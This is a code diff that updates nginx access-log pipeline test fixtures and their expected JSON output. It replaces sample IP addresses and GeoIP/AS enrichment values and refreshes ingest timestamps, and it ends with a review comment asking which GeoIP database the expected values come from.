@@ -304,7 +232,7 @@ "_tmp": {}, "related": { "ip": [ - "77.179.66.156" + "67.43.156.13" ] }, "http": { @@ -320,8 +248,8 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.246689800Z", - "original": "77.179.66.156 - - [07/Dec/2016:10:34:43 +0100] \"GET / HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", + "ingested": "2021-12-09T13:41:40.653079800Z", + "original": "67.43.156.13 - - [07/Dec/2016:10:34:43 +0100] \"GET / HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -350,31 +278,13 @@ "nginx": { "access": { "remote_ip_list": [ - "77.179.66.156" + "67.43.156.13" ] } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Germersheim", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", - "location": { - "lon": 8.3639, - "lat": 49.2231 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "77.179.66.156", - "ip": "77.179.66.156" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "url": { "path": "/favicon.ico", @@ -391,7 +301,7 @@ "_tmp": {}, "related": { "ip": [ - "77.179.66.156" + "67.43.156.13" ] }, "http": { 
@@ -408,8 +318,8 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.246697200Z", - "original": "77.179.66.156 - - [07/Dec/2016:10:34:43 +0100] \"GET /favicon.ico HTTP/1.1\" 404 571 \"http://localhost:8080/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", + "ingested": "2021-12-09T13:41:40.653088800Z", + "original": "67.43.156.13 - - [07/Dec/2016:10:34:43 +0100] \"GET /favicon.ico HTTP/1.1\" 404 571 \"http://localhost:8080/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -438,31 +348,13 @@ "nginx": { "access": { "remote_ip_list": [ - "77.179.66.156" + "67.43.156.13" ] } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Germersheim", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", - "location": { - "lon": 8.3639, - "lat": 49.2231 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "77.179.66.156", - "ip": "77.179.66.156" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "url": { "path": "/test", @@ -478,7 +370,7 @@ "_tmp": {}, "related": { "ip": [ - "77.179.66.156" + "67.43.156.13" ] }, "http": { 
@@ -494,8 +386,8 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.246704Z", - "original": "77.179.66.156 - - [07/Dec/2016:10:43:18 +0100] \"GET /test HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", + "ingested": "2021-12-09T13:41:40.653098400Z", + "original": "67.43.156.13 - - [07/Dec/2016:10:43:18 +0100] \"GET /test HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -524,31 +416,13 @@ "nginx": { "access": { "remote_ip_list": [ - "77.179.66.156" + "67.43.156.13" ] } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Germersheim", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", - "location": { - "lon": 8.3639, - "lat": 49.2231 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "77.179.66.156", - "ip": "77.179.66.156" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "url": { "path": "/test", @@ -564,7 +438,7 @@ "_tmp": {}, "related": { "ip": [ - "77.179.66.156" + "67.43.156.13" ] }, "http": { 
@@ -580,8 +454,8 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.246711400Z", - "original": "77.179.66.156 - - [07/Dec/2016:10:43:21 +0100] \"GET /test HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", + "ingested": "2021-12-09T13:41:40.653105800Z", + "original": "67.43.156.13 - - [07/Dec/2016:10:43:21 +0100] \"GET /test HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -610,31 +484,13 @@ "nginx": { "access": { "remote_ip_list": [ - "77.179.66.156" + "67.43.156.13" ] } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Germersheim", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", - "location": { - "lon": 8.3639, - "lat": 49.2231 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "77.179.66.156", - "ip": "77.179.66.156" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "url": { "path": "/test1", @@ -650,7 +506,7 @@ "_tmp": {}, "related": { "ip": [ - "77.179.66.156" + "67.43.156.13" ] }, "http": { 
@@ -666,8 +522,8 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.246717900Z", - "original": "77.179.66.156 - - [07/Dec/2016:10:43:23 +0100] \"GET /test1 HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", + "ingested": "2021-12-09T13:41:40.653111900Z", + "original": "67.43.156.13 - - [07/Dec/2016:10:43:23 +0100] \"GET /test1 HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -734,7 +590,7 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.246724400Z", + "ingested": "2021-12-09T13:41:40.653118Z", "original": "127.0.0.1 - - [07/Dec/2016:11:04:37 +0100] \"GET /test1 HTTP/1.1\" 404 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -802,7 +658,7 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.246753600Z", + "ingested": "2021-12-09T13:41:40.653124800Z", "original": "127.0.0.1 - - [07/Dec/2016:11:04:58 +0100] \"GET / HTTP/1.1\" 304 0 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -870,7 +726,7 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.246764800Z", + "ingested": "2021-12-09T13:41:40.653133100Z", "original": "127.0.0.1 - - [07/Dec/2016:11:04:59 +0100] \"GET / HTTP/1.1\" 304 0 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -938,7 +794,7 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.246772900Z", + "ingested": "2021-12-09T13:41:40.653141500Z", "original": "127.0.0.1 - - [07/Dec/2016:11:05:07 +0100] \"GET /taga HTTP/1.1\" 404 169 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"\nlessons.example.com 192.168.0.1 - - [09/Jun/2020:12:10:39 -0700] \"GET /A%20Beka%20G1%20Howe/029_AND_30/15%20reading%20elephants.mp4 HTTP/1.1\" 206 7648063 \"http://lessons.example.com/A%20Beka%20G1%20Howe/029_AND_30/15%20reading%20elephants.mp4\" \"Mozilla/5.0 (Linux; Android 5.1.1; KFFOWI) AppleWebKit/537.36 (KHTML, like Gecko) Silk/81.2.16 like Chrome/81.0.4044.138 Safari/537.36\"\nlessons.example.com 192.168.0.1 - - [09/Jun/2020:12:15:39 -0700] \"GET /%D0%A0%D1%83%D1%81%D1%81%D0%BA%D0%B0%D1%8F%20%D1%88%D0%BA%D0%BE%D0%BB%D0%B0%20-%20InternetUrok%201%D0%BA%D0%BB%D0%B0%D1%81%D1%81/ HTTP/1.1\" 206 7648063 \"http://lessons.example.com/A%20Beka%20G1%20Howe/029_AND_30/15%20reading%20elephants.mp4\" \"Mozilla/5.0 (Linux; Android 5.1.1; KFFOWI) AppleWebKit/537.36 (KHTML, like Gecko) Silk/81.2.16 like Chrome/81.0.4044.138 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/nginx/data_stream/access/_dev/test/pipeline/test-nginx.log b/packages/nginx/data_stream/access/_dev/test/pipeline/test-nginx.log index 50781d9d7aa..08310b13e22 100644 --- a/packages/nginx/data_stream/access/_dev/test/pipeline/test-nginx.log +++ b/packages/nginx/data_stream/access/_dev/test/pipeline/test-nginx.log 
@@ -1,9 +1,9 @@ 10.0.0.2, 10.0.0.1, 127.0.0.1 - - [07/Dec/2016:11:05:07 +0100] "GET /ocelot HTTP/1.1" 200 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0" 172.17.0.1 - - [29/May/2017:19:02:48 +0000] "GET /stringpatch HTTP/1.1" 404 612 "-" "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2" "-" -10.0.0.2, 10.0.0.1, 85.181.35.98 - - [07/Dec/2016:11:05:07 +0100] "GET /ocelot HTTP/1.1" 200 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0" -85.181.35.98 - - [07/Dec/2016:11:05:07 +0100] "GET /ocelot HTTP/1.1" 200 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36" +10.0.0.2, 10.0.0.1, 67.43.156.14 - - [07/Dec/2016:11:05:07 +0100] "GET /ocelot HTTP/1.1" 200 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0" +67.43.156.14 - - [07/Dec/2016:11:05:07 +0100] "GET /ocelot HTTP/1.1" 200 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36" "10.5.102.222, 199.96.1.1, 204.246.1.1" 10.2.1.185 - - [22/Jan/2016:13:18:29 +0000] "GET /assets/xxxx?q=100 HTTP/1.1" 200 25507 "-" "Amazon CloudFront" -2a03:0000:10ff:f00f:0000:0000:0:8000, 10.225.192.17 10.2.2.121 - - [30/Dec/2016:06:47:09 +0000] "GET /test.html HTTP/1.1" 404 8571 "-" "Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)" +2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6, 10.225.192.17 10.2.2.121 - - [30/Dec/2016:06:47:09 +0000] "GET /test.html HTTP/1.1" 404 8571 "-" "Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)" 127.0.0.1 - - [12/Apr/2018:09:48:40 +0200] "" 400 0 "-" "-" unix: - - [26/Feb/2019:15:39:42 +0100] "hello" 400 173 "-" "-" localhost - - [29/May/2017:19:02:48 +0000] "GET /test2 HTTP/1.1" 200 612 "-" "Mozilla/5.0 
(Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2" "-" diff --git a/packages/nginx/data_stream/access/_dev/test/pipeline/test-nginx.log-expected.json b/packages/nginx/data_stream/access/_dev/test/pipeline/test-nginx.log-expected.json index 2b40acbfc82..6c162949a28 100644 --- a/packages/nginx/data_stream/access/_dev/test/pipeline/test-nginx.log-expected.json +++ b/packages/nginx/data_stream/access/_dev/test/pipeline/test-nginx.log-expected.json @@ -44,7 +44,7 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.619833200Z", + "ingested": "2021-12-09T13:41:42.512992900Z", "original": "10.0.0.2, 10.0.0.1, 127.0.0.1 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -112,7 +112,7 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.619849400Z", + "ingested": "2021-12-09T13:41:42.513002400Z", "original": "172.17.0.1 - - [29/May/2017:19:02:48 +0000] \"GET /stringpatch HTTP/1.1\" 404 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -144,31 +144,13 @@ "remote_ip_list": [ "10.0.0.2", "10.0.0.1", - "85.181.35.98" + "67.43.156.14" ] } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-BE", - "city_name": "Berlin", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Land Berlin", - "location": { - "lon": 13.4531, - "lat": 52.4473 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "85.181.35.98", - "ip": "85.181.35.98" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "url": { "path": "/ocelot", @@ -184,7 +166,7 @@ "_tmp": {}, "related": { "ip": [ - "85.181.35.98" + "67.43.156.14" ] }, "http": { 
@@ -200,8 +182,8 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.619855Z", - "original": "10.0.0.2, 10.0.0.1, 85.181.35.98 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"", + "ingested": "2021-12-09T13:41:42.513008900Z", + "original": "10.0.0.2, 10.0.0.1, 67.43.156.14 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -230,31 +212,13 @@ "nginx": { "access": { "remote_ip_list": [ - "85.181.35.98" + "67.43.156.14" ] } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-BE", - "city_name": "Berlin", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Land Berlin", - "location": { - "lon": 13.4531, - "lat": 52.4473 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "85.181.35.98", - "ip": "85.181.35.98" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "url": { "path": "/ocelot", @@ -270,7 +234,7 @@ "_tmp": {}, "related": { "ip": [ - "85.181.35.98" + "67.43.156.14" ] }, "http": { 
@@ -286,8 +250,8 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.619859500Z", - "original": "85.181.35.98 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36\"\n\"10.5.102.222, 199.96.1.1, 204.246.1.1\" 10.2.1.185 - - [22/Jan/2016:13:18:29 +0000] \"GET /assets/xxxx?q=100 HTTP/1.1\" 200 25507 \"-\" \"Amazon CloudFront\"\n2a03:0000:10ff:f00f:0000:0000:0:8000, 10.225.192.17 10.2.2.121 - - [30/Dec/2016:06:47:09 +0000] \"GET /test.html HTTP/1.1\" 404 8571 \"-\" \"Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)\"", + "ingested": "2021-12-09T13:41:42.513013400Z", + "original": "67.43.156.14 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36\"\n\"10.5.102.222, 199.96.1.1, 204.246.1.1\" 10.2.1.185 - - [22/Jan/2016:13:18:29 +0000] \"GET /assets/xxxx?q=100 HTTP/1.1\" 200 25507 \"-\" \"Amazon CloudFront\"\n2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6, 10.225.192.17 10.2.2.121 - - [30/Dec/2016:06:47:09 +0000] \"GET /test.html HTTP/1.1\" 404 8571 \"-\" \"Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ 
@@ -342,7 +306,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-06-09T13:15:11.619863500Z", + "ingested": "2021-12-09T13:41:42.513018600Z", "original": "127.0.0.1 - - [12/Apr/2018:09:48:40 +0200] \"\" 400 0 \"-\" \"-\"\nunix: - - [26/Feb/2019:15:39:42 +0100] \"hello\" 400 173 \"-\" \"-\"\nlocalhost - - [29/May/2017:19:02:48 +0000] \"GET /test2 HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"\nlocalhost, localhost - - [29/May/2017:19:02:48 +0000] \"GET /test2 HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"\n", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/nginx/data_stream/access/_dev/test/pipeline/test-test-with-host.log b/packages/nginx/data_stream/access/_dev/test/pipeline/test-test-with-host.log index 0706028b6a0..be64f1d3bcd 100644 --- a/packages/nginx/data_stream/access/_dev/test/pipeline/test-test-with-host.log +++ b/packages/nginx/data_stream/access/_dev/test/pipeline/test-test-with-host.log 
@@ -1,10 +1,10 @@
 example.com 10.0.0.2, 10.0.0.1, 127.0.0.1 - - [07/Dec/2016:11:05:07 +0100] "GET /ocelot HTTP/1.1" 200 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0"
 example.com 172.17.0.1 - - [29/May/2017:19:02:48 +0000] "GET /stringpatch HTTP/1.1" 404 612 "-" "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2" "-"
-example.com 10.0.0.2, 10.0.0.1, 85.181.35.98 - - [07/Dec/2016:11:05:07 +0100] "GET /ocelot HTTP/1.1" 200 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0"
-example.com:80 85.181.35.98 - - [07/Dec/2016:11:05:07 +0100] "GET /ocelot HTTP/1.1" 200 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"
+example.com 10.0.0.2, 10.0.0.1, 67.43.156.14 - - [07/Dec/2016:11:05:07 +0100] "GET /ocelot HTTP/1.1" 200 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0"
+example.com:80 67.43.156.14 - - [07/Dec/2016:11:05:07 +0100] "GET /ocelot HTTP/1.1" 200 571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"
 example.com:80 "10.5.102.222, 199.96.1.1, 204.246.1.1" 10.2.1.185 - - [22/Jan/2016:13:18:29 +0000] "GET /assets/xxxx?q=100 HTTP/1.1" 200 25507 "-" "Amazon CloudFront"
-1.2.3.4 2a03:0000:10ff:f00f:0000:0000:0:8000, 10.225.192.17 10.2.2.121 - - [30/Dec/2016:06:47:09 +0000] "GET /test.html HTTP/1.1" 404 8571 "-" "Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)"
-1.2.3.4:80 127.0.0.1 - - [12/Apr/2018:09:48:40 +0200] "" 400 0 "-" "-"
+67.43.156.15 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6, 10.225.192.17 10.2.2.121 - - [30/Dec/2016:06:47:09 +0000] "GET /test.html HTTP/1.1" 404 8571 "-" "Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)"
+67.43.156.15:80 127.0.0.1 - - [12/Apr/2018:09:48:40 +0200] "" 400 0 "-" "-"
 example.com:80 unix: - - [26/Feb/2019:15:39:42 +0100] "hello" 400 173 "-" "-"
-1.2.3.4 localhost - - [29/May/2017:19:02:48 +0000] "GET /test2 HTTP/1.1" 200 612 "-" "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2" "-"
+67.43.156.15 localhost - - [29/May/2017:19:02:48 +0000] "GET /test2 HTTP/1.1" 200 612 "-" "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2" "-"
 example.com localhost, localhost - - [29/May/2017:19:02:48 +0000] "GET /test2 HTTP/1.1" 200 612 "-" "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2" "-"
diff --git a/packages/nginx/data_stream/access/_dev/test/pipeline/test-test-with-host.log-expected.json b/packages/nginx/data_stream/access/_dev/test/pipeline/test-test-with-host.log-expected.json
index 023c4583f95..208427cae38 100644
--- a/packages/nginx/data_stream/access/_dev/test/pipeline/test-test-with-host.log-expected.json
+++ b/packages/nginx/data_stream/access/_dev/test/pipeline/test-test-with-host.log-expected.json
@@ -48,8 +48,8 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.704779700Z", - "original": "example.com 10.0.0.2, 10.0.0.1, 127.0.0.1 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"\nexample.com 172.17.0.1 - - [29/May/2017:19:02:48 +0000] \"GET /stringpatch HTTP/1.1\" 404 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"\nexample.com 10.0.0.2, 10.0.0.1, 85.181.35.98 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"\nexample.com:80 85.181.35.98 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36\"\nexample.com:80 \"10.5.102.222, 199.96.1.1, 204.246.1.1\" 10.2.1.185 - - [22/Jan/2016:13:18:29 +0000] \"GET /assets/xxxx?q=100 HTTP/1.1\" 200 25507 \"-\" \"Amazon CloudFront\"", + "ingested": "2021-12-09T13:41:43.172715Z", + "original": "example.com 10.0.0.2, 10.0.0.1, 127.0.0.1 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"\nexample.com 172.17.0.1 - - [29/May/2017:19:02:48 +0000] \"GET /stringpatch HTTP/1.1\" 404 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"\nexample.com 10.0.0.2, 10.0.0.1, 67.43.156.14 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"\nexample.com:80 67.43.156.14 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36\"\nexample.com:80 \"10.5.102.222, 
199.96.1.1, 204.246.1.1\" 10.2.1.185 - - [22/Jan/2016:13:18:29 +0000] \"GET /assets/xxxx?q=100 HTTP/1.1\" 200 25507 \"-\" \"Amazon CloudFront\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -78,27 +78,33 @@ "nginx": { "access": { "remote_ip_list": [ - "2a03:0000:10ff:f00f:0000:0000:0:8000", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "10.225.192.17", "10.2.2.121" ] } }, "destination": { - "ip": "1.2.3.4" + "ip": "67.43.156.15" }, "source": { "geo": { "continent_name": "Europe", - "country_name": "Portugal", + "country_name": "Denmark", "location": { - "lon": -8.0, - "lat": 39.5 + "lon": 10.0, + "lat": 56.0 }, - "country_iso_code": "PT" + "country_iso_code": "DK" }, - "address": "2a03:0000:10ff:f00f:0000:0000:0:8000", - "ip": "2a03:0000:10ff:f00f:0000:0000:0:8000" + "as": { + "number": 62121, + "organization": { + "name": "Christian Ebsen ApS" + } + }, + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "url": { "path": "/test.html", @@ -115,8 +121,8 @@ "_tmp": {}, "related": { "ip": [ - "2a03:0000:10ff:f00f:0000:0000:0:8000", - "1.2.3.4" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "67.43.156.15" ] }, "http": { @@ -132,8 +138,8 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.704800200Z", - "original": "1.2.3.4 2a03:0000:10ff:f00f:0000:0000:0:8000, 10.225.192.17 10.2.2.121 - - [30/Dec/2016:06:47:09 +0000] \"GET /test.html HTTP/1.1\" 404 8571 \"-\" \"Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)\"", + "ingested": "2021-12-09T13:41:43.172728700Z", + "original": "67.43.156.15 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6, 10.225.192.17 10.2.2.121 - - [30/Dec/2016:06:47:09 +0000] \"GET /test.html HTTP/1.1\" 404 8571 \"-\" \"Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ 
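Review bot: The new geo and AS values for `2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6` in the `@@ -78,27 +78,33` hunk (`"country_iso_code": "DK"`, `"number": 62121`, `"name": "Christian Ebsen ApS"`) tie this expectation to one specific GeoIP database build, and nothing on the page says which database defines the "supported subset" that the changelog entries refer to. A reader therefore cannot tell whether a refresh of that database is expected to change these values or would signal a pipeline regression, and the same question applies to the IPv4 cases where enrichment is absent. A one-line comment in the test config that accompanies this fixture, or in the package README, naming the source would make the dependency explicit, e.g. `# geo/AS expectations come from <test GeoIP database name/version here>`.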
